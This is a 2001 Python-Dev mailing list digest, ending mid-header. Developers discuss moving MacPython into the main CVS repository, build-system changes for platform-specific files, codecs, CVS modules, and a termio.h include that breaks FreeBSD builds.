Subject: [Python-Dev] Added a machine-dependent file to the core
Message-ID: <20010507094600.217CE312BA0@snelboot.oratrix.nl>

To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
of Python does not allow for an easy addition of a platform-dependent 
sourcefile to the core interpreter (or am I missing something?). This is a bit 
of functionality I need to port the various Mac modules to MacOSX-python. The 
platform depende sourcefile has various glue routines for turning MacOS error 
codes into exceptions and that sort of stuff.

Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From jack@oratrix.nl  Mon May  7 10:49:17 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:49:17 +0200
Subject: [Python-Dev] Need a search path for modules in setup.py
Message-ID: <20010507094917.A8CBF312BA0@snelboot.oratrix.nl>

(Don't worry, this is the last in my flurry of OSX related messages:-)

Life would be a lot simpler for me if setup.py (the one for the main extension 
modules) would have a search path for module sourcefiles. As Mac modules 
currently live in Python/Mac/Modules (as opposed to Python/Modules) not having 
a search path measn I get ugly "../Mac/Modules/foomodule.c" constructs.

I have the code for setup.py ready, is it OK if I check it in?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From loewis@informatik.hu-berlin.de  Mon May  7 10:53:54 2001
From: loewis@informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 7 May 2001 11:53:54 +0200 (MEST)
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <200105070953.LAA14803@pandora.informatik.hu-berlin.de>

> There's two ways I can go about this: start a new MacPython project
> or merge the MacPython stuff into the main Python CVS repository.

There is actually a third option: Use the Python SF project, but
create a new module in the Python CVS repository (so no merging would
be done).

I don't know how much code this is. I'd favour merging the Mac code
into the core distribution. If there are loads of Mac-specific modules
that not every MacPython user needs, it might be advisable to create a
distutils package that contains the extra modules. Such a package
should still live in cvs.python.sourceforge.net:/cvsroot/python.

Just my 0.02EUR,

Martin


From guido@digicool.com  Mon May  7 15:00:08 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 07 May 2001 09:00:08 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: Your message of "Mon, 07 May 2001 11:53:54 +0200."
 <200105070953.LAA14803@pandora.informatik.hu-berlin.de>
References: <200105070953.LAA14803@pandora.informatik.hu-berlin.de>
Message-ID: <200105071400.JAA25627@cj20424-a.reston1.va.home.com>

[Jack]
> > There's two ways I can go about this: start a new MacPython project
> > or merge the MacPython stuff into the main Python CVS repository.

We have platform-specific subdirectories for so many projects that
it's a shame we don't have the Mac code in there as well!

The only (small) advantage I can imagine of a separate MacPython
project would be that you (Jack) can more easily give others commit
permission to the Mac tree without giving them commit permission to
all of Python (which requires they gain the trust of a larger group of
Python developers).  Of course, I don't know if you expect much help
from others who are not already Python developers.

[Martin]
> There is actually a third option: Use the Python SF project, but
> create a new module in the Python CVS repository (so no merging would
> be done).

I don't know much about modules, but would this allow Jack to check
out the main code and the MacPython code into a single work directory
(which he needs)?  If so, it may be the best solution.

Note that no matter how you do it, you'll have to submit a tree of RCS
files to the SF sysadmins to load, unless you want to lose years of
MacPython cvs logs...

> I don't know how much code this is. I'd favour merging the Mac code
> into the core distribution. If there are loads of Mac-specific modules
> that not every MacPython user needs, it might be advisable to create a
> distutils package that contains the extra modules. Such a package
> should still live in cvs.python.sourceforge.net:/cvsroot/python.

Undecidedly yours,

(Jack, regarding your Makefile and setup.py changes: I'd wait for
opinions on your patches from Neil and Andrew.  I don't see why
they would have an objection to adding these features, but the
specific implementation you propose might be subject to comments.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com (Skip Montanaro)  Mon May  7 14:04:15 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Mon, 7 May 2001 08:04:15 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
References: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
Message-ID: <15094.40271.461338.638822@beluga.mojam.com>

    Jack> ... I'd like to move MacPython to sourceforge. There's two ways I
    Jack> can go about this: start a new MacPython project or merge the
    Jack> MacPython stuff into the main Python CVS repository.

I say merge.  

Skip


From nas@python.ca  Mon May  7 14:14:52 2001
From: nas@python.ca (Neil Schemenauer)
Date: Mon, 7 May 2001 06:14:52 -0700
Subject: [Python-Dev] Added a machine-dependent file to the core
In-Reply-To: <20010507094600.217CE312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:45:59AM +0200
References: <20010507094600.217CE312BA0@snelboot.oratrix.nl>
Message-ID: <20010507061452.A23494@glacier.fnational.com>

Jack Jansen wrote:
> To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
> of Python does not allow for an easy addition of a platform-dependent 
> sourcefile to the core interpreter (or am I missing something?).

No, its still a big ugly hack. :-)

> This is a bit of functionality I need to port the various Mac
> modules to MacOSX-python. The platform depende sourcefile has
> various glue routines for turning MacOS error codes into
> exceptions and that sort of stuff.
> 
> Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?

How would this work?  Would MACHDEP_OBJS be set by an autoconf
subsitution?

  Neil


From jack@oratrix.nl  Mon May  7 14:17:18 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 15:17:18 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: Message by Guido van Rossum <guido@digicool.com> ,
 Mon, 07 May 2001 09:00:08 -0500 , <200105071400.JAA25627@cj20424-a.reston1.va.home.com>
Message-ID: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>

> We have platform-specific subdirectories for so many projects that
> it's a shame we don't have the Mac code in there as well!

Great! I'll pack up my repository and send it to the 
sourceforge-powers-that-be shortly. The write permission for other MacPython 
developers shouldn't be a problem, I think Just is currently the only person 
with write permission (but I have to check).


> (Jack, regarding your Makefile and setup.py changes: I'd wait for
> opinions on your patches from Neil and Andrew.  I don't see why
> they would have an objection to adding these features, but the
> specific implementation you propose might be subject to comments.)

Definitely. I'll put them up as patches and then see what happens.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From jack@oratrix.nl  Mon May  7 14:27:14 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 15:27:14 +0200
Subject: [Python-Dev] Added a machine-dependent file to the core
In-Reply-To: Message by Neil Schemenauer <nas@python.ca> ,
 Mon, 7 May 2001 06:14:52 -0700 , <20010507061452.A23494@glacier.fnational.com>
Message-ID: <20010507132714.B0808312BA1@snelboot.oratrix.nl>

> Jack Jansen wrote:
> > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
> > of Python does not allow for an easy addition of a platform-dependent 
> > sourcefile to the core interpreter (or am I missing something?).
> [...]
> > 
> > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?
> 
> How would this work?  Would MACHDEP_OBJS be set by an autoconf
> subsitution?

Yes, that's what I had in mind (haven't written the code yet). Similar to the 
way DYNLOADFILE is set, but empty for all platforms except for OSX.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From nas@python.ca  Mon May  7 14:30:42 2001
From: nas@python.ca (Neil Schemenauer)
Date: Mon, 7 May 2001 06:30:42 -0700
Subject: [Python-Dev] Added a machine-dependent file to the core
In-Reply-To: <20010507132714.B0808312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:27:14PM +0200
References: <nas@python.ca> <20010507132714.B0808312BA1@snelboot.oratrix.nl>
Message-ID: <20010507063042.D23494@glacier.fnational.com>

Jack Jansen wrote:
> Yes, that's what I had in mind (haven't written the code yet). Similar to the 
> way DYNLOADFILE is set, but empty for all platforms except for OSX.

Sounds good to me.  Try to keep the code somewhat general so that
other platforms may use it.

  Neil


From mal@lemburg.com  Mon May  7 19:44:55 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 07 May 2001 20:44:55 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>
 <3AF0662D.48671B4E@lemburg.com> <200105051145.GAA14831@cj20424-a.reston1.va.home.com>
Message-ID: <3AF6ED27.FB2C077B@lemburg.com>

Guido van Rossum wrote:
> 
> > I've attached the patch. Due to a small reorganisation the
> > patch is a little longer -- symmetry has its price at C level
> > too ;-)
> 
> Looks good on paper, so go ahead and check it in.  Watch out for
> potential changes caused by Tim's iter-crusade!  :-)

OK. I'll look into this later this week.
 
> While you're at it, why don't you check in the rot13 codec you posted
> -- it's good to have simle examples in the standard library.
> It would also be cool to have codecs for common file encodings like
> base64, quoted-printable, binhex, uuencode, and even hex
> (binascii.hexlify).

Right. I'll add these in the next few weeks -- as time comes
along.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From martin@loewis.home.cs.tu-berlin.de  Mon May  7 22:21:27 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 7 May 2001 23:21:27 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <200105072121.f47LLRc01252@mira.informatik.hu-berlin.de>

> I don't know much about modules, but would this allow Jack to check
> out the main code and the MacPython code into a single work
> directory (which he needs)?

Using CVS modules allows to merge parts of the tree into a single
sandbox. E.g. you could do

macpython python/dist/src &Mac

'cvs co macpython' then would give you a dist/src directory, which
also contains a Mac directory (where Mac is another module, alongside
with /python, or a CVSROOT/modules entry).

You could use an exclude list, e.g.

macpython !PC !PCbuild !RISCOS python/dist/src &Mac

What you *cannot* do is to merge modules on a per-directory basis; all
files in a single directory must come from the same CVS module - you
can think of ampersand modules similar to Unix mount(1)ed file
systems.

Regards,
Martin


From tim.one@home.com  Tue May  8 05:14:22 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 8 May 2001 00:14:22 -0400
Subject: [Python-Dev] Help with SF bug 105470
Message-ID: <LNBBLJKPBEHFEDALKOLCGEMFKAAA.tim.one@home.com>

An ancient bug just got (re?)discovered on c.l.py, which I entered into SF:

http://sourceforge.net/tracker/?func=detail&aid=422177&group_id=5470&
    atid=105470

This has to do w/ gross loss of precision in manifest Python float constants,
if and only if a module is loaded from .pyc or .pyo format.  Since's it's
fp-related, and fp is tricky x-platform, I'd like some volunteers to test
this before I check it in.

Current CVS Python contains a dormant test case.  There's a patch attached to
the bug report that activates the test case, and tries to repair the problem.
After the patch, the fix works if and only if test_import doesn't fail,
neither after deleting all .pyc/.pyo files first, nor if run a second time
w/o deleting .pyc/.pyo.

Works on Win98SE, but you may have already guessed that <wink>.


From tim.one@home.com  Tue May  8 05:52:37 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 8 May 2001 00:52:37 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <E14wyrU-0005qO-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>

[Jeremy Hylton, on python-checkins]
> ...
> XXX When should nested scopes by made non-optional on the trunk?

Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
have trouble sleeping tonight <wink>.


From thomas@xs4all.net  Tue May  8 11:14:20 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 12:14:20 +0200
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <15090.64389.746625.331215@anthem.wooz.org>; from barry@digicool.com on Fri, May 04, 2001 at 02:57:09PM -0400
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com> <15090.64389.746625.331215@anthem.wooz.org>
Message-ID: <20010508121420.Y16486@xs4all.nl>

On Fri, May 04, 2001 at 02:57:09PM -0400, Barry A. Warsaw wrote:

> >>>>> "JE" == Jeff Epler <jepler@inetnebr.com> writes:

>     | Why not let us spell this as:
>     | 	class X(Y):
>     | 		from Y import foo as _sfoo, bar as _sbar
>     | 		...

>     NS> This already has a meaning in Python.  Paul's suggested syntax
>     NS> is pretty neat, IMHO.

> Not if Y is a class though, right?  That would currently raise an
> ImportError, ...

Nope:

>>> class string:
...     pass
... 
>>> from string import split
>>> string
<class __main__.string at 8072e90>
>>> 

That could be considered a misfeature for more than one reason (like
importing from non-module objects, which you now do by inserting the object
into sys.modules) but can't be fixed without breaking backward
compatibility, except by inventing new syntax.

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From Mark.Favas@per.dem.csiro.au  Tue May  8 11:34:37 2001
From: Mark.Favas@per.dem.csiro.au (Favas, Mark (EM, Floreat))
Date: Tue, 8 May 2001 18:34:37 +0800
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
Message-ID: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU>

A change to termios.c in the last couple of days to #include termio.h as
well as termios.h breaks the build on FreeBSD, which has only termios.h -
needs an autoconf test? There'll probably be other similar systems.

Cheers, Mark 


From thomas@xs4all.net  Tue May  8 12:36:38 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 13:36:38 +0200
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>; from tim.one@home.com on Sun, May 06, 2001 at 02:15:57PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>
Message-ID: <20010508133638.Z16486@xs4all.nl>

On Sun, May 06, 2001 at 02:15:57PM -0400, Tim Peters wrote:

> Given the new dict iterators in 2.2, there's an easier fast way that doesn't
> mutate the dict even under the covers:

> def arb(dict):
>     if dict:
>         return dict.iteritems().next()
>     raise KeyError("arb passed an empty dict")

You probably want:

arb = dict.iteritems().next

so that you don't keep on returning the same key,value pair.

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas@xs4all.net  Tue May  8 13:10:00 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 14:10:00 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:39:43AM +0200
References: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
Message-ID: <20010508141000.A16486@xs4all.nl>

On Mon, May 07, 2001 at 11:39:43AM +0200, Jack Jansen wrote:

> The Mac specific stuff for Python is all concentrated in a single subtree Mac 
> of the main Python tree (the subtree has its own hierarchy of 
> Python/Modules/Lib/etc directories), so putting it in the main repository 
> should not pollute the filenamespace all that much. It would also have the 
> advantage that a single "cvs update" would update everything (whereas the 
> current situation for Mac developers, where Python/Mac is from a different 
> CVSROOT than Python, does not have that advantage). The downside is that 
> everyone who does a full checkout of the tree would get an extra 1000 or so 
> files on their disk that are pretty useless unless they have a mac.

I'd say merge, except that the number '1000' is very large. Is it really
1000 ? The current Python tree contains only 304 .c and .h files, about 1000
.py files spread out over the tree (567 of which in Lib, the rest in
Demo/Tools) and obviously some misc files and CVS stuff, for a total of
around 2500 files. Is that 1000 a real number ? No temp files,
auto-generated files, .o files etc ? How large are they ? (the average size
in the current CVS tree is about 10k)

I'd probably still say 'merge', I'm just curious where the large number of
files comes from. Is it to keep the changes to the original files minimal ?
Given the number of platform-dependant #ifdefs and differently-defined
macro's we're using now, I don't see why some of those changes couldn't be
moved into the original files, if that's the case.

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas@xs4all.net  Tue May  8 13:13:39 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 14:13:39 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:17:18PM +0200
References: <guido@digicool.com> <20010507131718.C22B7312BA1@snelboot.oratrix.nl>
Message-ID: <20010508141339.B16486@xs4all.nl>

On Mon, May 07, 2001 at 03:17:18PM +0200, Jack Jansen wrote:

> > We have platform-specific subdirectories for so many projects that
> > it's a shame we don't have the Mac code in there as well!

> Great! I'll pack up my repository and send it to the 
> sourceforge-powers-that-be shortly. The write permission for other MacPython 
> developers shouldn't be a problem, I think Just is currently the only person 
> with write permission (but I have to check).

That doesn't mean there isn't a problem. Just doesn't have write access :)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From guido@digicool.com  Tue May  8 14:35:50 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 08 May 2001 08:35:50 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: Your message of "Tue, 08 May 2001 00:52:37 -0400."
 <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>
Message-ID: <200105081335.IAA28415@cj20424-a.reston1.va.home.com>

> [Jeremy Hylton, on python-checkins]
> > ...
> > XXX When should nested scopes by made non-optional on the trunk?

[Tim]
> Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
> have trouble sleeping tonight <wink>.

+1.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Tue May  8 14:41:42 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 08 May 2001 08:41:42 -0500
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
In-Reply-To: Your message of "Tue, 08 May 2001 18:34:37 +0800."
 <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU>
References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU>
Message-ID: <200105081341.IAA28486@cj20424-a.reston1.va.home.com>

> A change to termios.c in the last couple of days to #include termio.h as
> well as termios.h breaks the build on FreeBSD, which has only termios.h -
> needs an autoconf test? There'll probably be other similar systems.

Frankly, I don't see the point of including termio.h at all -- it
seems to be a backwards compatibility file.

Mark, can you please enter this in the bug database and assign it to
whoever checked in the change? :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas@python.ca  Tue May  8 15:05:01 2001
From: nas@python.ca (Neil Schemenauer)
Date: Tue, 8 May 2001 07:05:01 -0700
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>; from tim.one@home.com on Tue, May 08, 2001 at 12:52:37AM -0400
References: <E14wyrU-0005qO-00@usw-pr-cvs1.sourceforge.net> <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>
Message-ID: <20010508070501.A25794@glacier.fnational.com>

Tim Peters wrote:
> [Jeremy Hylton, on python-checkins]
> > ...
> > XXX When should nested scopes by made non-optional on the trunk?
> 
> Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
> have trouble sleeping tonight <wink>.

Shouldn't the entry in the __future__ file be:

    nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0))

or am I misunderstanding something?

  Neil


From jack@oratrix.nl  Tue May  8 15:07:39 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Tue, 08 May 2001 16:07:39 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: Message by Thomas Wouters <thomas@xs4all.net> ,
 Tue, 8 May 2001 14:10:00 +0200 , <20010508141000.A16486@xs4all.nl>
Message-ID: <20010508140741.790E5379B72@snelboot.oratrix.nl>

> I'd say merge, except that the number '1000' is very large. Is it really
> 1000 ? The current Python tree contains only 304 .c and .h files, about 1000
> .py files spread out over the tree (567 of which in Lib, the rest in
> Demo/Tools) and obviously some misc files and CVS stuff, for a total of
> around 2500 files. Is that 1000 a real number ? No temp files,
> auto-generated files, .o files etc ? How large are they ? (the average size
> in the current CVS tree is about 10k)

It's actually 830 files. This is 320 .py files (130 in Lib, the rest in 
Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build 
system), 30 resource files and then assorted things (html documentation, 
scripts to drive the distribution builder, etc).

The .xml and .exp files and about 20 of the .c files are machine generated, so 
they could technically be left out of the repository. The generation process 
of these files is a bit painful, though, so I've added them as a convenience 
(the reasoning is a bit along the lines of the Grammar stuff of the core).

The one thing that I should do is clean out the "Unsupported" directory before 
doing the merge. It contains some stuff that is long dead. But then, it isn't 
all that many files.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From mwh@python.net  Tue May  8 15:41:45 2001
From: mwh@python.net (Michael Hudson)
Date: Tue, 8 May 2001 15:41:45 +0100 (BST)
Subject: [Python-Dev] Recent change to termios module breaks build on
 FreeBSD
Message-ID: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>

Guido van Rossum <guido@digicool.com> writes:

> > A change to termios.c in the last couple of days to #include termio.h
> > as well as termios.h breaks the build on FreeBSD, which has only
> > termios.h - needs an autoconf test? There'll probably be other similar
> > systems.
>
> Frankly, I don't see the point of including termio.h at all -- it
> seems to be a backwards compatibility file.

If you don't include termio.h the build breaks on alpha/OSF1.  This
sounds to me like OSF1's headers are broken (you can't include
sys/ioctl.h without including termio.h first, it seems, or you get
complaints about struct termio being undefined).  So I'd suggest

+#ifdef __osf__
 #include <termio.h>
+#endif

and then see if the build breaks anywhere else (I love unix).

Using the sf compile farm, I've tested this on FreeBSD, Linux/x86,
Linux/PPC, OSF1/alpha, Linux/sparc, Solaris/sparc (using gcc; cc gives
a pile of warnings from redefined macros and then dies 'cause it can't
find a valiud license file).

So we might need some more magic for solaris using cc.

Cheers,
M.

-- 
  Imagine if every Thursday your shoes exploded if you tied them
  the usual way.  This happens to us all the time with computers,
  and nobody thinks of complaining.                     -- Jeff Raskin


From fdrake@acm.org  Tue May  8 15:45:18 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Tue, 8 May 2001 10:45:18 -0400 (EDT)
Subject: [Python-Dev] Recent change to termios module breaks build on
 FreeBSD
In-Reply-To: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>
References: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>
Message-ID: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com>

Michael Hudson writes:
 > If you don't include termio.h the build breaks on alpha/OSF1.  This
 > sounds to me like OSF1's headers are broken (you can't include
 > sys/ioctl.h without including termio.h first, it seems, or you get
 > complaints about struct termio being undefined).  So I'd suggest
 > 
 > +#ifdef __osf__
 >  #include <termio.h>
 > +#endif
 > 
 > and then see if the build breaks anywhere else (I love unix).

  Does it make more sense to do this or to test for termio.h in
configure?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From m.favas@per.dem.csiro.au  Tue May  8 15:47:39 2001
From: m.favas@per.dem.csiro.au (Mark Favas)
Date: Tue, 08 May 2001 22:47:39 +0800
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> <200105081341.IAA28486@cj20424-a.reston1.va.home.com>
Message-ID: <3AF8070B.87D3C5B2@per.dem.csiro.au>

Guido van Rossum wrote:
> 
> > A change to termios.c in the last couple of days to #include termio.h as
> > well as termios.h breaks the build on FreeBSD, which has only termios.h -
> > needs an autoconf test? There'll probably be other similar systems.
> 
> Frankly, I don't see the point of including termio.h at all -- it
> seems to be a backwards compatibility file.
> 
> Mark, can you please enter this in the bug database and assign it to
> whoever checked in the change? :-)

Done - Michael Hudson wrote the patch, so I've assigned the bug to Fred
Drake <grin>

-- 
Mark Favas  -   m.favas@per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From thomas@xs4all.net  Tue May  8 16:52:49 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 17:52:49 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>; from jack@oratrix.nl on Tue, May 08, 2001 at 04:07:39PM +0200
References: <thomas@xs4all.net> <20010508140741.790E5379B72@snelboot.oratrix.nl>
Message-ID: <20010508175248.E16486@xs4all.nl>

On Tue, May 08, 2001 at 04:07:39PM +0200, Jack Jansen wrote:

[ Jack wants to add the +/- 1000 extra files from the MacPython source tree
  to the Python CVS repository ]

> It's actually 830 files. This is 320 .py files (130 in Lib, the rest in 
> Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build 
> system), 30 resource files and then assorted things (html documentation, 
> scripts to drive the distribution builder, etc).

I'd say merge it. If there had been decent CVS clients for the mac when you
started, those files would have been in the CVS tree already. 

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From skip@pobox.com (Skip Montanaro)  Tue May  8 19:22:17 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Tue, 8 May 2001 13:22:17 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>
References: <thomas@xs4all.net>
 <20010508141000.A16486@xs4all.nl>
 <20010508140741.790E5379B72@snelboot.oratrix.nl>
Message-ID: <15096.14681.773554.729550@beluga.mojam.com>

    Jack> It's actually 830 files. ... 120 .c/.h files ...

How many of those 120 files are variants of existing source files that (in
theory) could be merged with their mainline counterparts?

Skip


From mwh@python.net  Tue May  8 23:27:59 2001
From: mwh@python.net (Michael Hudson)
Date: 08 May 2001 23:27:59 +0100
Subject: [Python-Dev] Recent change to termios module breaks build on  FreeBSD
In-Reply-To: "Fred L. Drake, Jr."'s message of "Tue, 8 May 2001 10:45:18 -0400 (EDT)"
References: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain> <15096.1662.137269.996490@cj42289-a.reston1.va.home.com>
Message-ID: <m3pudjscgg.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake, Jr." <fdrake@acm.org> writes:

> Michael Hudson writes:
>  > If you don't include termio.h the build breaks on alpha/OSF1.  This
>  > sounds to me like OSF1's headers are broken (you can't include
>  > sys/ioctl.h without including termio.h first, it seems, or you get
>  > complaints about struct termio being undefined).  So I'd suggest
>  > 
>  > +#ifdef __osf__
>  >  #include <termio.h>
>  > +#endif
>  > 
>  > and then see if the build breaks anywhere else (I love unix).
> 
>   Does it make more sense to do this or to test for termio.h in
> configure?

If you're asking *me*, I have no idea.  I'd hope that no system would
be as broken as osf1 is in this regard, but then I'd have hoped that
osf1 wasn't this broken too...

I guess the test in configure is "safer" in some sense.  Getting this
perfectly right would probably require more autoconf hackery than one
can possibly imagine... ncurses generates an amk script from
./configure that is then run to produce term.h, but I'm not sure that
all of that is devoted to including the right headers.

can-we-just-have-TERMIOS-back?-ly y'rs
M.

-- 
  Good? Bad? Strap him into the IETF-approved witch-dunking
  apparatus immediately!                        -- NTK now, 21/07/2000


From mark@per.dem.csiro.au  Wed May  9 01:53:01 2001
From: mark@per.dem.csiro.au (Mark Favas)
Date: Wed, 9 May 101 13:52:09 +0800 (WST)
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
Message-ID: <200105090552.NAA08038@erebus.per.dem.csiro.au>

Changes in the last few hours (hi Tim!) to stringobject compile (I'd guess) on
MS (and on Compaq's Tru64 compiler), but produce the following with gcc on
Solaris and FreeBSD:

gcc -c -g -O2 -Wall -Wstrict-prototypes -I. -I./Include -DHAVE_CONFIG_H  -o Objects/stringobject.o Objects/stringobject.c
Objects/stringobject.c: In function `PyString_FromStringAndSize':
Objects/stringobject.c:76: invalid lvalue in unary `&'
Objects/stringobject.c:80: invalid lvalue in unary `&'
Objects/stringobject.c: In function `PyString_FromString':
Objects/stringobject.c:130: invalid lvalue in unary `&'
Objects/stringobject.c:134: invalid lvalue in unary `&'
*** Error code 1


-- 
Email - m.favas@per.dem.csiro.au        Postal - Mark C Favas
Phone - +61 8 9333 6268, 041 892 6074            CSIRO Exploration & Mining
Fax   - +61 8 9387 8642                          Private Bag No 5
                                                 Wembley, Western Australia 6913


From tim.one@home.com  Wed May  9 07:48:12 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 9 May 2001 02:48:12 -0400
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
